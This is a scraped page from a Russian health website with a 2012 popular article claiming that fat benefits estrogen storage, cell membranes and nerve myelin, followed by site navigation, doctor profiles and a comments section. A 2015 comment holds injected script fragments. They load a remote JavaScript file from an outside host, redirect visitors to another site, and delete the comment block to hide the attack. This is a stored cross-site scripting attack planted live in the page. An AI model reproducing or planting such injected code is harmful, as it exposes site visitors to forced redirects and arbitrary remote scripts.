Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Жир – это полезно  >>  Жир – это полезно
 
Обратная связь
 

Жир – это полезно

Размер шрифта
19 января 2012 08:49
  • google_analytics: false
  • Нравится

Отказ от жирной пищи – это во-первых, победа над собой, во-вторых, шаг к здоровому образу жизни. Но в благих начинаниях не стоит забывать о собственном здоровье. Ведь жир – это не только вредно, но и полезно. 

1 

  1. Накопление эстрогена

Когда у девочки начинается менструация, она начинает прибавлять в весе, и бедра у нее становятся округлыми, так как в этой области откладывается жир. Этот жир участвует в синтезе женских половых гормонов (эстрогенов). Нормальный уровень эстрогенов поддерживает здоровье внутренних органов и делает кости крепкими.

Когда организм перестает вырабатывать эстрогены, кости постепенно теряют кальций и становятся хрупкими. Это приводит к остеопорозу – болезни тонких костей. Отложенные же «про запас» эстрогены позволяют избежать остеопороза. Полные женщины в период менопаузы реже ломают кости, если бедра у них округлые. Но полнота полноте рознь: жир может быть на бедрах, но талия должна оставаться тонкой. И если исчезла талия, это говорит о накоплении опасного висцерального жира, препятствующего работе внутренних органов.

  1. Влияние на функции клеток

Все клеточные мембраны нашего организма состоят из жиров. Мембрана является каркасом любой клетки и проводит к клетке микроэлементы, питательные вещества и кислород. Жирные кислоты в мембране повышают подвижность клетки, они же делают ее стрессоустойчивой, защищают от разрушений, позволяют контактировать с другими клетками. Кроме того жир в мембране улучшает чувствительность организма к инсулину, а также улучшает синтез белка в процессе пищеварения.

  1. Формирование миелиновых оболочек

Оказывается, без жира невозможна никакая умственная деятельность. Оболочки нервных клеток, длинных волокон, по которым сигналы нервного возбуждения поступают в мозг и обеспечивают нашу разумную деятельность, тоже состоят из жира. Все нервные клетки покрыты миелином, особой оболочкой, которая по сути, является жиром. Только благодаря этому электрический импульс нервного возбуждения попадает, куда следует, а не прыгает как попало с клетки на клетку.

Если миелиновый слой истончается и замещается патологическими белками, у человека развивается слабоумие.

Что делать?

Нельзя отказываться от жиров полностью. Но это не значит, что надо питаться говядиной и сливочным маслом. Выбирайте полиненасыщенные жиры, которые, например, содержатся в рыбе.


Cюжеты по теме:
Жир. Зачем он нам нужен



 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:00

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Бурый жир поможет похудеть   Сухой закон: как правильно увлажнять кожу   Мифы про мясо. Не питайтесь иллюзиями!   Три типа ожирения  
27 февраля 2013Бурый жир поможет похудеть 27 мая 2013Почему женщины толстеют после 45? Как этого избежать?
 
20 июля 2012Кости можно делать из жира! 22 февраля 2012Омега-3 уменьшают риск заболеваний сердца у детей
 

Слайдшоу

1
Весы OMRON HN289
Монитор состава тела OMRON BF508
Как нас обманывают! Продукты-обманщики!

Тесты

Жиры, которые мы едим
Что вы знаете о печени?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.